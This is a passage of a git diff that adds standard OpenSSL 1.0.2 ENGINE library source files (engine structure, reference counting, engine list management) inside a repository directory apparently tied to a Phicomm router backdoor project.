+int engine_unlocked_finish(ENGINE *e, int unlock_for_handlers);
+int engine_free_util(ENGINE *e, int locked);
+
+/*
+ * This function will reset all "set"able values in an ENGINE to NULL. This
+ * won't touch reference counts or ex_data, but is equivalent to calling all
+ * the ENGINE_set_***() functions with a NULL value.
+ */
+void engine_set_all_null(ENGINE *e);
+
+/*
+ * NB: Bitwise OR-able values for the "flags" variable in ENGINE are now
+ * exposed in engine.h.
+ */
+
+/* Free up dynamically allocated public key methods associated with ENGINE */
+
+void engine_pkey_meths_free(ENGINE *e);
+void engine_pkey_asn1_meths_free(ENGINE *e);
+
+/*
+ * This is a structure for storing implementations of various crypto
+ * algorithms and functions.
+ */
+struct engine_st {
+    const char *id;
+    const char *name;
+    const RSA_METHOD *rsa_meth;
+    const DSA_METHOD *dsa_meth;
+    const DH_METHOD *dh_meth;
+    const ECDH_METHOD *ecdh_meth;
+    const ECDSA_METHOD *ecdsa_meth;
+    const RAND_METHOD *rand_meth;
+    const STORE_METHOD *store_meth;
+    /* Cipher handling is via this callback */
+    ENGINE_CIPHERS_PTR ciphers;
+    /* Digest handling is via this callback */
+    ENGINE_DIGESTS_PTR digests;
+    /* Public key handling via this callback */
+    ENGINE_PKEY_METHS_PTR pkey_meths;
+    /* ASN1 public key handling via this callback */
+    ENGINE_PKEY_ASN1_METHS_PTR pkey_asn1_meths;
+    ENGINE_GEN_INT_FUNC_PTR destroy;
+    ENGINE_GEN_INT_FUNC_PTR init;
+    ENGINE_GEN_INT_FUNC_PTR finish;
+    ENGINE_CTRL_FUNC_PTR ctrl;
+    ENGINE_LOAD_KEY_PTR load_privkey;
+    ENGINE_LOAD_KEY_PTR load_pubkey;
+    ENGINE_SSL_CLIENT_CERT_PTR load_ssl_client_cert;
+    const ENGINE_CMD_DEFN *cmd_defns;
+    int flags;
+    /* reference count on the structure itself */
+    int struct_ref;
+    /*
+     * reference count on usability of the engine type. NB: This controls the
+     * loading and initialisation of any functionlity required by this
+     * engine, whereas the previous count is simply to cope with
+     * (de)allocation of this structure. Hence, running_ref <= struct_ref at
+     * all times.
+     */
+    int funct_ref;
+    /* A place to store per-ENGINE data */
+    CRYPTO_EX_DATA ex_data;
+    /* Used to maintain the linked-list of engines. */
+    struct engine_st *prev;
+    struct engine_st *next;
+};
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif                          /* HEADER_ENGINE_INT_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_lib.c
new file mode 100644
index 0000000..dc2abd2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_lib.c
@@ -0,0 +1,347 @@
+/* crypto/engine/eng_lib.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+#include <openssl/rand.h>
+
+/* The "new"/"free" stuff first */
+
+ENGINE *ENGINE_new(void)
+{
+    ENGINE *ret;
+
+    ret = (ENGINE *)OPENSSL_malloc(sizeof(ENGINE));
+    if (ret == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    memset(ret, 0, sizeof(ENGINE));
+    ret->struct_ref = 1;
+    engine_ref_debug(ret, 0, 1)
+        CRYPTO_new_ex_data(CRYPTO_EX_INDEX_ENGINE, ret, &ret->ex_data);
+    return ret;
+}
+
+/*
+ * Placed here (close proximity to ENGINE_new) so that modifications to the
+ * elements of the ENGINE structure are more likely to be caught and changed
+ * here.
+ */
+void engine_set_all_null(ENGINE *e)
+{
+    e->id = NULL;
+    e->name = NULL;
+    e->rsa_meth = NULL;
+    e->dsa_meth = NULL;
+    e->dh_meth = NULL;
+    e->rand_meth = NULL;
+    e->store_meth = NULL;
+    e->ciphers = NULL;
+    e->digests = NULL;
+    e->destroy = NULL;
+    e->init = NULL;
+    e->finish = NULL;
+    e->ctrl = NULL;
+    e->load_privkey = NULL;
+    e->load_pubkey = NULL;
+    e->cmd_defns = NULL;
+    e->flags = 0;
+}
+
+int engine_free_util(ENGINE *e, int locked)
+{
+    int i;
+
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_FREE_UTIL, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (locked)
+        i = CRYPTO_add(&e->struct_ref, -1, CRYPTO_LOCK_ENGINE);
+    else
+        i = --e->struct_ref;
+    engine_ref_debug(e, 0, -1)
+        if (i > 0)
+        return 1;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "ENGINE_free, bad structural reference count\n");
+        abort();
+    }
+#endif
+    /* Free up any dynamically allocated public key methods */
+    engine_pkey_meths_free(e);
+    engine_pkey_asn1_meths_free(e);
+    /*
+     * Give the ENGINE a chance to do any structural cleanup corresponding to
+     * allocation it did in its constructor (eg. unload error strings)
+     */
+    if (e->destroy)
+        e->destroy(e);
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_ENGINE, e, &e->ex_data);
+    OPENSSL_free(e);
+    return 1;
+}
+
+int ENGINE_free(ENGINE *e)
+{
+    return engine_free_util(e, 1);
+}
+
+/* Cleanup stuff */
+
+/*
+ * ENGINE_cleanup() is coded such that anything that does work that will need
+ * cleanup can register a "cleanup" callback here. That way we don't get
+ * linker bloat by referring to all *possible* cleanups, but any linker bloat
+ * into code "X" will cause X's cleanup function to end up here.
+ */
+static STACK_OF(ENGINE_CLEANUP_ITEM) *cleanup_stack = NULL;
+static int int_cleanup_check(int create)
+{
+    if (cleanup_stack)
+        return 1;
+    if (!create)
+        return 0;
+    cleanup_stack = sk_ENGINE_CLEANUP_ITEM_new_null();
+    return (cleanup_stack ? 1 : 0);
+}
+
+static ENGINE_CLEANUP_ITEM *int_cleanup_item(ENGINE_CLEANUP_CB *cb)
+{
+    ENGINE_CLEANUP_ITEM *item = OPENSSL_malloc(sizeof(ENGINE_CLEANUP_ITEM));
+    if (!item)
+        return NULL;
+    item->cb = cb;
+    return item;
+}
+
+void engine_cleanup_add_first(ENGINE_CLEANUP_CB *cb)
+{
+    ENGINE_CLEANUP_ITEM *item;
+    if (!int_cleanup_check(1))
+        return;
+    item = int_cleanup_item(cb);
+    if (item)
+        sk_ENGINE_CLEANUP_ITEM_insert(cleanup_stack, item, 0);
+}
+
+void engine_cleanup_add_last(ENGINE_CLEANUP_CB *cb)
+{
+    ENGINE_CLEANUP_ITEM *item;
+    if (!int_cleanup_check(1))
+        return;
+    item = int_cleanup_item(cb);
+    if (item)
+        sk_ENGINE_CLEANUP_ITEM_push(cleanup_stack, item);
+}
+
+/* The API function that performs all cleanup */
+static void engine_cleanup_cb_free(ENGINE_CLEANUP_ITEM *item)
+{
+    (*(item->cb)) ();
+    OPENSSL_free(item);
+}
+
+void ENGINE_cleanup(void)
+{
+    if (int_cleanup_check(0)) {
+        sk_ENGINE_CLEANUP_ITEM_pop_free(cleanup_stack,
+                                        engine_cleanup_cb_free);
+        cleanup_stack = NULL;
+    }
+    /*
+     * FIXME: This should be handled (somehow) through RAND, eg. by it
+     * registering a cleanup callback.
+     */
+    RAND_set_rand_method(NULL);
+}
+
+/* Now the "ex_data" support */
+
+int ENGINE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                            CRYPTO_EX_dup *dup_func,
+                            CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_ENGINE, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int ENGINE_set_ex_data(ENGINE *e, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&e->ex_data, idx, arg));
+}
+
+void *ENGINE_get_ex_data(const ENGINE *e, int idx)
+{
+    return (CRYPTO_get_ex_data(&e->ex_data, idx));
+}
+
+/*
+ * Functions to get/set an ENGINE's elements - mainly to avoid exposing the
+ * ENGINE structure itself.
+ */
+
+int ENGINE_set_id(ENGINE *e, const char *id)
+{
+    if (id == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_SET_ID, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    e->id = id;
+    return 1;
+}
+
+int ENGINE_set_name(ENGINE *e, const char *name)
+{
+    if (name == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_SET_NAME, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    e->name = name;
+    return 1;
+}
+
+int ENGINE_set_destroy_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR destroy_f)
+{
+    e->destroy = destroy_f;
+    return 1;
+}
+
+int ENGINE_set_init_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR init_f)
+{
+    e->init = init_f;
+    return 1;
+}
+
+int ENGINE_set_finish_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR finish_f)
+{
+    e->finish = finish_f;
+    return 1;
+}
+
+int ENGINE_set_ctrl_function(ENGINE *e, ENGINE_CTRL_FUNC_PTR ctrl_f)
+{
+    e->ctrl = ctrl_f;
+    return 1;
+}
+
+int ENGINE_set_flags(ENGINE *e, int flags)
+{
+    e->flags = flags;
+    return 1;
+}
+
+int ENGINE_set_cmd_defns(ENGINE *e, const ENGINE_CMD_DEFN *defns)
+{
+    e->cmd_defns = defns;
+    return 1;
+}
+
+const char *ENGINE_get_id(const ENGINE *e)
+{
+    return e->id;
+}
+
+const char *ENGINE_get_name(const ENGINE *e)
+{
+    return e->name;
+}
+
+ENGINE_GEN_INT_FUNC_PTR ENGINE_get_destroy_function(const ENGINE *e)
+{
+    return e->destroy;
+}
+
+ENGINE_GEN_INT_FUNC_PTR ENGINE_get_init_function(const ENGINE *e)
+{
+    return e->init;
+}
+
+ENGINE_GEN_INT_FUNC_PTR ENGINE_get_finish_function(const ENGINE *e)
+{
+    return e->finish;
+}
+
+ENGINE_CTRL_FUNC_PTR ENGINE_get_ctrl_function(const ENGINE *e)
+{
+    return e->ctrl;
+}
+
+int ENGINE_get_flags(const ENGINE *e)
+{
+    return e->flags;
+}
+
+const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *e)
+{
+    return e->cmd_defns;
+}
+
+/*
+ * eng_lib.o is pretty much linked into anything that touches ENGINE already,
+ * so put the "static_state" hack here.
+ */
+
+static int internal_static_hack = 0;
+
+void *ENGINE_get_static_state(void)
+{
+    return &internal_static_hack;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_list.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_list.c
new file mode 100644
index 0000000..3384e31
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_list.c
@@ -0,0 +1,404 @@
+/* crypto/engine/eng_list.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include "eng_int.h"
+
+/*
+ * The linked-list of pointers to engine types. engine_list_head incorporates
+ * an implicit structural reference but engine_list_tail does not - the
+ * latter is a computational niceity and only points to something that is
+ * already pointed to by its predecessor in the list (or engine_list_head
+ * itself). In the same way, the use of the "prev" pointer in each ENGINE is
+ * to save excessive list iteration, it doesn't correspond to an extra
+ * structural reference. Hence, engine_list_head, and each non-null "next"
+ * pointer account for the list itself assuming exactly 1 structural
+ * reference on each list member.
+ */
+static ENGINE *engine_list_head = NULL;
+static ENGINE *engine_list_tail = NULL;
+
+/*
+ * This cleanup function is only needed internally. If it should be called,
+ * we register it with the "ENGINE_cleanup()" stack to be called during
+ * cleanup.
+ */
+
+static void engine_list_cleanup(void)
+{
+    ENGINE *iterator = engine_list_head;
+
+    while (iterator != NULL) {
+        ENGINE_remove(iterator);
+        iterator = engine_list_head;
+    }
+    return;
+}
+
+/*
+ * These static functions starting with a lower case "engine_" always take
+ * place when CRYPTO_LOCK_ENGINE has been locked up.
+ */
+static int engine_list_add(ENGINE *e)
+{
+    int conflict = 0;
+    ENGINE *iterator = NULL;
+
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_LIST_ADD, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    iterator = engine_list_head;
+    while (iterator && !conflict) {
+        conflict = (strcmp(iterator->id, e->id) == 0);
+        iterator = iterator->next;
+    }
+    if (conflict) {
+        ENGINEerr(ENGINE_F_ENGINE_LIST_ADD, ENGINE_R_CONFLICTING_ENGINE_ID);
+        return 0;
+    }
+    if (engine_list_head == NULL) {
+        /* We are adding to an empty list. */
+        if (engine_list_tail) {
+            ENGINEerr(ENGINE_F_ENGINE_LIST_ADD, ENGINE_R_INTERNAL_LIST_ERROR);
+            return 0;
+        }
+        engine_list_head = e;
+        e->prev = NULL;
+        /*
+         * The first time the list allocates, we should register the cleanup.
+         */
+        engine_cleanup_add_last(engine_list_cleanup);
+    } else {
+        /* We are adding to the tail of an existing list. */
+        if ((engine_list_tail == NULL) || (engine_list_tail->next != NULL)) {
+            ENGINEerr(ENGINE_F_ENGINE_LIST_ADD, ENGINE_R_INTERNAL_LIST_ERROR);
+            return 0;
+        }
+        engine_list_tail->next = e;
+        e->prev = engine_list_tail;
+    }
+    /*
+     * Having the engine in the list assumes a structural reference.
+     */
+    e->struct_ref++;
+    engine_ref_debug(e, 0, 1)
+        /* However it came to be, e is the last item in the list. */
+        engine_list_tail = e;
+    e->next = NULL;
+    return 1;
+}
+
+static int engine_list_remove(ENGINE *e)
+{
+    ENGINE *iterator;
+
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_LIST_REMOVE, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    /* We need to check that e is in our linked list! */
+    iterator = engine_list_head;
+    while (iterator && (iterator != e))
+        iterator = iterator->next;
+    if (iterator == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_LIST_REMOVE,
+                  ENGINE_R_ENGINE_IS_NOT_IN_LIST);
+        return 0;
+    }
+    /* un-link e from the chain. */
+    if (e->next)
+        e->next->prev = e->prev;
+    if (e->prev)
+        e->prev->next = e->next;
+    /* Correct our head/tail if necessary. */
+    if (engine_list_head == e)
+        engine_list_head = e->next;
+    if (engine_list_tail == e)
+        engine_list_tail = e->prev;
+    engine_free_util(e, 0);
+    return 1;
+}
+
+/* Get the first/last "ENGINE" type available. */
+ENGINE *ENGINE_get_first(void)
+{
+    ENGINE *ret;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    ret = engine_list_head;
+    if (ret) {
+        ret->struct_ref++;
+        engine_ref_debug(ret, 0, 1)
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return ret;
+}
+
+ENGINE *ENGINE_get_last(void)
+{
+    ENGINE *ret;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    ret = engine_list_tail;
+    if (ret) {
+        ret->struct_ref++;
+        engine_ref_debug(ret, 0, 1)
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return ret;
+}
+
+/* Iterate to the next/previous "ENGINE" type (NULL = end of the list). */
+ENGINE *ENGINE_get_next(ENGINE *e)
+{
+    ENGINE *ret = NULL;
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_GET_NEXT, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    ret = e->next;
+    if (ret) {
+        /* Return a valid structural refernce to the next ENGINE */
+        ret->struct_ref++;
+        engine_ref_debug(ret, 0, 1)
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    /* Release the structural reference to the previous ENGINE */
+    ENGINE_free(e);
+    return ret;
+}
+
+ENGINE *ENGINE_get_prev(ENGINE *e)
+{
+    ENGINE *ret = NULL;
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_GET_PREV, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    ret = e->prev;
+    if (ret) {
+        /* Return a valid structural reference to the next ENGINE */
+        ret->struct_ref++;
+        engine_ref_debug(ret, 0, 1)
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    /* Release the structural reference to the previous ENGINE */
+    ENGINE_free(e);
+    return ret;
+}
+
+/* Add another "ENGINE" type into the list. */
+int ENGINE_add(ENGINE *e)
+{
+    int to_return = 1;
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_ADD, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if ((e->id == NULL) || (e->name == NULL)) {
+        ENGINEerr(ENGINE_F_ENGINE_ADD, ENGINE_R_ID_OR_NAME_MISSING);
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (!engine_list_add(e)) {
+        ENGINEerr(ENGINE_F_ENGINE_ADD, ENGINE_R_INTERNAL_LIST_ERROR);
+        to_return = 0;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return to_return;
+}
+
+/* Remove an existing "ENGINE" type from the array. */
+int ENGINE_remove(ENGINE *e)
+{
+    int to_return = 1;
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_REMOVE, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (!engine_list_remove(e)) {
+        ENGINEerr(ENGINE_F_ENGINE_REMOVE, ENGINE_R_INTERNAL_LIST_ERROR);
+        to_return = 0;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return to_return;
+}
+
+static void engine_cpy(ENGINE *dest, const ENGINE *src)
+{
+    dest->id = src->id;
+    dest->name = src->name;
+#ifndef OPENSSL_NO_RSA
+    dest->rsa_meth = src->rsa_meth;
+#endif
+#ifndef OPENSSL_NO_DSA
+    dest->dsa_meth = src->dsa_meth;
+#endif
+#ifndef OPENSSL_NO_DH
+    dest->dh_meth = src->dh_meth;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    dest->ecdh_meth = src->ecdh_meth;
+#endif
+#ifndef OPENSSL_NO_ECDSA
+    dest->ecdsa_meth = src->ecdsa_meth;
+#endif
+    dest->rand_meth = src->rand_meth;
+    dest->store_meth = src->store_meth;
+    dest->ciphers = src->ciphers;
+    dest->digests = src->digests;
+    dest->pkey_meths = src->pkey_meths;
+    dest->destroy = src->destroy;
+    dest->init = src->init;
+    dest->finish = src->finish;
+    dest->ctrl = src->ctrl;
+    dest->load_privkey = src->load_privkey;
+    dest->load_pubkey = src->load_pubkey;
+    dest->cmd_defns = src->cmd_defns;
+    dest->flags = src->flags;
+}
+
+ENGINE *ENGINE_by_id(const char *id)
+{
+    ENGINE *iterator;
+    char *load_dir = NULL;
+    if (id == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_BY_ID, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    iterator = engine_list_head;
+    while (iterator && (strcmp(id, iterator->id) != 0))
+        iterator = iterator->next;
+    if (iterator) {
+        /*
+         * We need to return a structural reference. If this is an ENGINE
+         * type that returns copies, make a duplicate - otherwise increment
+         * the existing ENGINE's reference count.
+         */
+        if (iterator->flags & ENGINE_FLAGS_BY_ID_COPY) {
+            ENGINE *cp = ENGINE_new();
+            if (!cp)
+                iterator = NULL;
+            else {
+                engine_cpy(cp, iterator);
+                iterator = cp;
+            }
+        } else {
+            iterator->struct_ref++;
+            engine_ref_debug(iterator, 0, 1)
+        }
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+#if 0
+    if (iterator == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_BY_ID, ENGINE_R_NO_SUCH_ENGINE);
+        ERR_add_error_data(2, "id=", id);
+    }
+    return iterator;
+#else
+    /* EEK! Experimental code starts */
+    if (iterator)
+        return iterator;
+    /*
+     * Prevent infinite recusrion if we're looking for the dynamic engine.
+     */
+    if (strcmp(id, "dynamic")) {
+# ifdef OPENSSL_SYS_VMS
+        if ((load_dir = getenv("OPENSSL_ENGINES")) == 0)
+            load_dir = "SSLROOT:[ENGINES]";
+# else
+        if ((load_dir = getenv("OPENSSL_ENGINES")) == 0)
+            load_dir = ENGINESDIR;
+# endif
+        iterator = ENGINE_by_id("dynamic");
+        if (!iterator || !ENGINE_ctrl_cmd_string(iterator, "ID", id, 0) ||
+            !ENGINE_ctrl_cmd_string(iterator, "DIR_LOAD", "2", 0) ||
+            !ENGINE_ctrl_cmd_string(iterator, "DIR_ADD",
+                                    load_dir, 0) ||
+            !ENGINE_ctrl_cmd_string(iterator, "LIST_ADD", "1", 0) ||
+            !ENGINE_ctrl_cmd_string(iterator, "LOAD", NULL, 0))
+            goto notfound;
+        return iterator;
+    }
+ notfound:
+    ENGINE_free(iterator);
+    ENGINEerr(ENGINE_F_ENGINE_BY_ID, ENGINE_R_NO_SUCH_ENGINE);
+    ERR_add_error_data(2, "id=", id);
+    return NULL;
+    /* EEK! Experimental code ends */
+#endif
+}
+
+int ENGINE_up_ref(ENGINE *e)
+{
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_UP_REF, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_add(&e->struct_ref, 1, CRYPTO_LOCK_ENGINE);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_openssl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_openssl.c
new file mode 100644
index 0000000..34b0029
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_openssl.c
@@ -0,0 +1,402 @@
+/* crypto/engine/eng_openssl.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
